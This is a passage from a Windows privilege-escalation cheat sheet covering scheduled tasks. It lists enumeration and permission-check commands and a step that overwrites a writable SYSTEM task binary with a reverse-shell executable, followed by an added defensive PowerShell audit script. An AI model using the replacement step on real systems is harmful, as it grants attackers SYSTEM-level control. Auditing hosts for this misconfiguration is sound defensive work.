SCHEDULED TASKS
List scheduled tasks
All scheduled tasks — Tasks running as SYSTEM
schtasks /query /fo LIST /v
Get-ScheduledTask
Example Output
schtasks /query /fo LIST /v | findstr /i /c:"TaskName" /c:"Run As User" /c:"Task To Run"
TaskName: \CustomBackup
Run As User: SYSTEM
Task To Run: C:\Scripts\backup.bat
(Runs as SYSTEM - check if script is writable)
Writable task scripts
Can you modify the script? — Runs as task owner
Check permissions on scripts referenced by tasks
icacls <script_path>
Example Output
schtasks /query /fo LIST /v | findstr /i "task run author"
TaskName: \Backup
Run As User: SYSTEM
Task To Run: C:\Scripts\backup.bat
icacls C:\Scripts\backup.bat
BUILTIN\Users:(F) <- FULL CONTROL!
(Modify script, wait for execution)
Task binary replacement
Replace with reverse shell — Waits for next scheduled run
If task runs a binary you can overwrite
Example Output
Task runs: C:\Scripts\app.exe
icacls C:\Scripts\app.exe -> Users:(F)
copy C:\temp\rev.exe C:\Scripts\app.exe /Y
(Wait for scheduled run or trigger manually)
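Audit example (added here, not part of the original cheat sheet): for administrators checking a host for the misconfiguration above, this lists tasks that run as SYSTEM whose target file grants write-level rights to low-privileged groups. It goes one step beyond the icacls check by also testing the parent folder. The helper name Get-WeakAce and the SID list are assumptions of this example. Run it from an elevated prompt so every ACL can be read.

```powershell
# Added audit example, not code from the original page.
# Well-known SIDs (locale independent): Everyone, Authenticated Users,
# INTERACTIVE, BUILTIN\Users.
$lowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-4', 'S-1-5-32-545'
$sidType     = [System.Security.Principal.SecurityIdentifier]
# Rights that let a principal modify or replace the file (no read bits).
$writeBits   = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

# Hypothetical helper: returns Allow ACEs on $Path that give a low-privileged
# SID any of the write-level rights above.
function Get-WeakAce {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    $acl.GetAccessRules($true, $true, $sidType) | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPrivSids -contains $_.IdentityReference.Value -and
        ([int]$_.FileSystemRights -band $writeBits)
    }
}

Get-ScheduledTask |
    Where-Object { $_.Principal.UserId -match '(^|\\)SYSTEM$|^S-1-5-18$' } |
    ForEach-Object {
        $task = $_
        # Only Exec actions have an Execute path; COM handler actions are skipped.
        foreach ($action in @($task.Actions | Where-Object { $_.Execute })) {
            $target = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            # A writable folder allows replacing the file, so check both.
            foreach ($p in $target, (Split-Path -Path $target -Parent)) {
                if (-not $p) { continue }
                foreach ($ace in Get-WeakAce -Path $p) {
                    [pscustomobject]@{
                        Task     = $task.TaskPath + $task.TaskName
                        Path     = $p
                        Identity = $ace.IdentityReference.Value
                        Rights   = $ace.FileSystemRights
                    }
                }
            }
        }
    }
```

Each row returned is a finding to fix by limiting write access on that path to Administrators and SYSTEM. Scripts passed to an interpreter through the action's Arguments (for example cmd.exe /c script.bat) are not parsed here and still need a manual icacls check.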